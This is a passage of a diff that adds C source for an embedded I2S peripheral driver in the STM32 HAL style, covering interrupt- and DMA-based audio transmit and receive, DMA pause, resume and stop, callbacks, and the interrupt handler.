parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Transmit_IT(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_TX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pTxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + } + + /* Enable TXE and ERR interrupt */ + __HAL_I2S_ENABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Receive an amount of data in non-blocking mode with Interrupt + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to the Receive data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @note It is recommended to use DMA for the I2S receiver to avoid de-synchronization + * between Master and Slave otherwise the I2S interrupt should be optimized. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Receive_IT(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_RX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pRxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + /* Enable RXNE and ERR interrupt */ + __HAL_I2S_ENABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Transmit an amount of data in non-blocking mode with DMA + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to the Transmit data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Transmit_DMA(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_TX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pTxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + } + + /* Set the I2S Tx DMA Half transfer complete callback */ + hi2s->hdmatx->XferHalfCpltCallback = I2S_DMATxHalfCplt; + + /* Set the I2S Tx DMA transfer complete callback */ + hi2s->hdmatx->XferCpltCallback = I2S_DMATxCplt; + + /* Set the DMA error callback */ + hi2s->hdmatx->XferErrorCallback = I2S_DMAError; + + /* Enable the Tx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hi2s->hdmatx, + (uint32_t)hi2s->pTxBuffPtr, + (uint32_t)&hi2s->Instance->DR, + hi2s->TxXferSize)) + { + /* Update SPI error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + hi2s->State = HAL_I2S_STATE_READY; + + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + + /* Check if the I2S is already enabled */ + if (HAL_IS_BIT_CLR(hi2s->Instance->I2SCFGR, SPI_I2SCFGR_I2SE)) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + /* Check if the I2S Tx request is already enabled */ + if (HAL_IS_BIT_CLR(hi2s->Instance->CR2, SPI_CR2_TXDMAEN)) + { + /* Enable Tx DMA Request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + } + + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Receive an amount of data in non-blocking mode with DMA + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to the Receive data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Receive_DMA(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_RX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pRxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + /* Set the I2S Rx DMA Half transfer complete callback */ + hi2s->hdmarx->XferHalfCpltCallback = I2S_DMARxHalfCplt; + + /* Set the I2S Rx DMA transfer complete callback */ + hi2s->hdmarx->XferCpltCallback = I2S_DMARxCplt; + + /* Set the DMA error callback */ + hi2s->hdmarx->XferErrorCallback = I2S_DMAError; + + /* Check if Master Receiver mode is selected */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_RX) + { + /* Clear the Overrun Flag by a read operation to the SPI_DR register followed by a read + access to the SPI_SR register. */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + } + + /* Enable the Rx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hi2s->hdmarx, (uint32_t)&hi2s->Instance->DR, (uint32_t)hi2s->pRxBuffPtr, + hi2s->RxXferSize)) + { + /* Update SPI error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + hi2s->State = HAL_I2S_STATE_READY; + + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + + /* Check if the I2S is already enabled */ + if (HAL_IS_BIT_CLR(hi2s->Instance->I2SCFGR, SPI_I2SCFGR_I2SE)) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + /* Check if the I2S Rx request is already enabled */ + if (HAL_IS_BIT_CLR(hi2s->Instance->CR2, SPI_CR2_RXDMAEN)) + { + /* Enable Rx DMA Request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + } + + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Pauses the audio DMA Stream/Channel playing from the Media. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_DMAPause(I2S_HandleTypeDef *hi2s) +{ + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State == HAL_I2S_STATE_BUSY_TX) + { + /* Disable the I2S DMA Tx request */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + } + else if (hi2s->State == HAL_I2S_STATE_BUSY_RX) + { + /* Disable the I2S DMA Rx request */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + } +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + else if (hi2s->State == HAL_I2S_STATE_BUSY_TX_RX) + { + /* Pause the audio file playing by disabling the I2S DMA request */ + CLEAR_BIT(hi2s->Instance->CR2, (SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN)); + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, (SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN)); + } +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + else + { + /* nothing to do */ + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2s); + + return HAL_OK; +} + +/** + * @brief Resumes the audio DMA Stream/Channel playing from the Media. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_DMAResume(I2S_HandleTypeDef *hi2s) +{ + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State == HAL_I2S_STATE_BUSY_TX) + { + /* Enable the I2S DMA Tx request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + } + else if (hi2s->State == HAL_I2S_STATE_BUSY_RX) + { + /* Enable the I2S DMA Rx request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + } +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + else if (hi2s->State == HAL_I2S_STATE_BUSY_TX_RX) + { + /* Pause the audio file playing by disabling the I2S DMA request */ + SET_BIT(hi2s->Instance->CR2, (SPI_CR2_RXDMAEN | SPI_CR2_TXDMAEN)); + SET_BIT(I2SxEXT(hi2s->Instance)->CR2, (SPI_CR2_RXDMAEN | SPI_CR2_TXDMAEN)); + + /* If the I2Sext peripheral is still not enabled, enable it */ + if ((I2SxEXT(hi2s->Instance)->I2SCFGR & SPI_I2SCFGR_I2SE) == 0U) + { + /* Enable I2Sext peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + } + } +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + else + { + /* nothing to do */ + } + + /* If the I2S peripheral is still not enabled, enable it */ + if (HAL_IS_BIT_CLR(hi2s->Instance->I2SCFGR, SPI_I2SCFGR_I2SE)) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2s); + + return HAL_OK; +} + +/** + * @brief Stops the audio DMA Stream/Channel playing from the Media. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_DMAStop(I2S_HandleTypeDef *hi2s) +{ +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + uint32_t tickstart; +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + HAL_StatusTypeDef errorcode = HAL_OK; + /* The Lock is not implemented on this API to allow the user application + to call the HAL SPI API under callbacks HAL_I2S_TxCpltCallback() or HAL_I2S_RxCpltCallback() + when calling HAL_DMA_Abort() API the DMA TX or RX Transfer complete interrupt is generated + and the correspond call back is executed HAL_I2S_TxCpltCallback() or HAL_I2S_RxCpltCallback() + */ + + if ((hi2s->Init.Mode == I2S_MODE_MASTER_TX) || (hi2s->Init.Mode == I2S_MODE_SLAVE_TX)) + { + /* Abort the I2S DMA tx Stream/Channel */ + if (hi2s->hdmatx != NULL) + { + /* Disable the I2S DMA tx Stream/Channel */ + if (HAL_OK != HAL_DMA_Abort(hi2s->hdmatx)) + { + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + errorcode = HAL_ERROR; + } + } + + /* Wait until TXE flag is set */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_TXE, SET, I2S_TIMEOUT_FLAG) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + + /* Wait until BSY flag is Reset */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_BSY, RESET, I2S_TIMEOUT_FLAG) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + + /* Disable I2S peripheral */ + __HAL_I2S_DISABLE(hi2s); + + /* Clear UDR flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Disable the I2S Tx DMA requests */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + + if (hi2s->State == HAL_I2S_STATE_BUSY_TX_RX) + { + /* Abort the I2S DMA rx Stream/Channel */ + if (hi2s->hdmarx != NULL) + { + /* Disable the I2S DMA rx Stream/Channel */ + if (HAL_OK != HAL_DMA_Abort(hi2s->hdmarx)) + { + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + errorcode = HAL_ERROR; + } + } + + /* Disable I2Sext peripheral */ + __HAL_I2SEXT_DISABLE(hi2s); + + /* Clear OVR flag */ + __HAL_I2SEXT_CLEAR_OVRFLAG(hi2s); + + /* Disable the I2SxEXT DMA request */ + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_RXDMAEN); + + if (hi2s->Init.Mode == I2S_MODE_SLAVE_TX) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_BUSY_LINE_RX); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + else + { + /* Read DR to Flush RX Data */ + READ_REG(I2SxEXT(hi2s->Instance)->DR); + } + } +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + } + + else if ((hi2s->Init.Mode == I2S_MODE_MASTER_RX) || (hi2s->Init.Mode == I2S_MODE_SLAVE_RX)) + { + /* Abort the I2S DMA rx Stream/Channel */ + if (hi2s->hdmarx != NULL) + { + /* Disable the I2S DMA rx Stream/Channel */ + if (HAL_OK != HAL_DMA_Abort(hi2s->hdmarx)) + { + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + errorcode = HAL_ERROR; + } + } +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + + if (hi2s->State == HAL_I2S_STATE_BUSY_TX_RX) + { + /* Abort the I2S DMA tx Stream/Channel */ + if (hi2s->hdmatx != NULL) + { + /* Disable the I2S DMA tx Stream/Channel */ + if (HAL_OK != HAL_DMA_Abort(hi2s->hdmatx)) + { + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + errorcode = HAL_ERROR; + } + } + + tickstart = HAL_GetTick(); + + /* Wait until TXE flag is set */ + while (__HAL_I2SEXT_GET_FLAG(hi2s, I2S_FLAG_TXE) != SET) + { + if (((HAL_GetTick() - tickstart) > I2S_TIMEOUT_FLAG)) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + } + + /* Wait until BSY flag is Reset */ + while (__HAL_I2SEXT_GET_FLAG(hi2s, I2S_FLAG_BSY) != RESET) + { + if (((HAL_GetTick() - tickstart) > I2S_TIMEOUT_FLAG)) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + } + + /* Disable I2Sext peripheral */ + __HAL_I2SEXT_DISABLE(hi2s); + + /* Clear UDR flag */ + __HAL_I2SEXT_CLEAR_UDRFLAG(hi2s); + + /* Disable the I2SxEXT DMA request */ + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_TXDMAEN); + } +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + /* Disable I2S peripheral */ + __HAL_I2S_DISABLE(hi2s); + + /* Clear OVR flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Disable the I2S Rx DMA request */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + + if (hi2s->Init.Mode == I2S_MODE_SLAVE_RX) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_BUSY_LINE_RX); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + errorcode = HAL_ERROR; + } + else + { + /* Read DR to Flush RX Data */ + READ_REG((hi2s->Instance)->DR); + } + } + + hi2s->State = HAL_I2S_STATE_READY; + + return errorcode; +} + +/** + * @brief This function handles I2S interrupt request. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +void HAL_I2S_IRQHandler(I2S_HandleTypeDef *hi2s) +{ + /* Call the IrqHandler ISR set during HAL_I2S_INIT */ + hi2s->IrqHandlerISR(hi2s); +} + +/** + * @brief Tx Transfer Half completed callbacks + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_TxHalfCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_TxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Transfer completed callbacks + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_TxCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer half completed callbacks + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_RxHalfCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_RxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_RxCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief I2S error callbacks + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_ErrorCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup I2S_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the I2S state + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL state + */ +HAL_I2S_StateTypeDef HAL_I2S_GetState(I2S_HandleTypeDef *hi2s) +{ + return hi2s->State; +} + +/** + * @brief Return the I2S error code + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval I2S Error Code + */ +uint32_t HAL_I2S_GetError(I2S_HandleTypeDef *hi2s) +{ + return hi2s->ErrorCode; +} +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup I2S_Private_Functions I2S Private Functions + * @{ + */ +/** + * @brief DMA I2S transmit process complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2S_DMATxCplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* if DMA is configured in DMA_NORMAL Mode */ + if (hdma->Init.Mode == DMA_NORMAL) + { + /* Disable Tx DMA Request */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + + hi2s->TxXferCount = 0U; + hi2s->State = HAL_I2S_STATE_READY; + } + /* Call user Tx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxCpltCallback(hi2s); +#else + HAL_I2S_TxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S transmit process half complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2S_DMATxHalfCplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Call user Tx half complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxHalfCpltCallback(hi2s); +#else + HAL_I2S_TxHalfCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S receive process complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2S_DMARxCplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* if DMA is configured in DMA_NORMAL Mode */ + if (hdma->Init.Mode == DMA_NORMAL) + { + /* Disable Rx DMA Request */ + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + hi2s->RxXferCount = 0U; + hi2s->State = HAL_I2S_STATE_READY; + } + /* Call user Rx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->RxCpltCallback(hi2s); +#else + HAL_I2S_RxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S receive process half complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2S_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Call user Rx half complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->RxHalfCpltCallback(hi2s); +#else + HAL_I2S_RxHalfCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S communication error callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2S_DMAError(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Disable Rx and Tx DMA Request */ + CLEAR_BIT(hi2s->Instance->CR2, (SPI_CR2_RXDMAEN | SPI_CR2_TXDMAEN)); + hi2s->TxXferCount = 0U; + hi2s->RxXferCount = 0U; + + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief Transmit an amount of data in non-blocking mode with Interrupt + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +static void I2S_Transmit_IT(I2S_HandleTypeDef *hi2s) +{ + /* Transmit data */ + hi2s->Instance->DR = (*hi2s->pTxBuffPtr); + hi2s->pTxBuffPtr++; + hi2s->TxXferCount--; + + if (hi2s->TxXferCount == 0U) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + hi2s->State = HAL_I2S_STATE_READY; + /* Call user Tx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxCpltCallback(hi2s); +#else + HAL_I2S_TxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Receive an amount of data in non-blocking mode with Interrupt + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +static void I2S_Receive_IT(I2S_HandleTypeDef *hi2s) +{ + /* Receive data */ + (*hi2s->pRxBuffPtr) = (uint16_t)hi2s->Instance->DR; + hi2s->pRxBuffPtr++; + hi2s->RxXferCount--; + + if (hi2s->RxXferCount == 0U) + { + /* Disable RXNE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + hi2s->State = HAL_I2S_STATE_READY; + /* Call user Rx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->RxCpltCallback(hi2s); +#else + HAL_I2S_RxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } +} + +/** + * @brief This function handles I2S interrupt request. + * @param hi2s: pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +static void I2S_IRQHandler(I2S_HandleTypeDef *hi2s) +{ + __IO uint32_t i2ssr = hi2s->Instance->SR; + + if (hi2s->State == HAL_I2S_STATE_BUSY_RX) + { + /* I2S in mode Receiver ------------------------------------------------*/ + if (((i2ssr & I2S_FLAG_RXNE) == I2S_FLAG_RXNE) && (__HAL_I2S_GET_IT_SOURCE(hi2s, I2S_IT_RXNE) != RESET)) + { + I2S_Receive_IT(hi2s); + } + + /* I2S Overrun error interrupt occurred -------------------------------------*/ + if (((i2ssr & I2S_FLAG_OVR) == I2S_FLAG_OVR) && (__HAL_I2S_GET_IT_SOURCE(hi2s, I2S_IT_ERR) != RESET)) + { + /* Disable RXNE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Clear Overrun flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + + /* Set the error code and execute 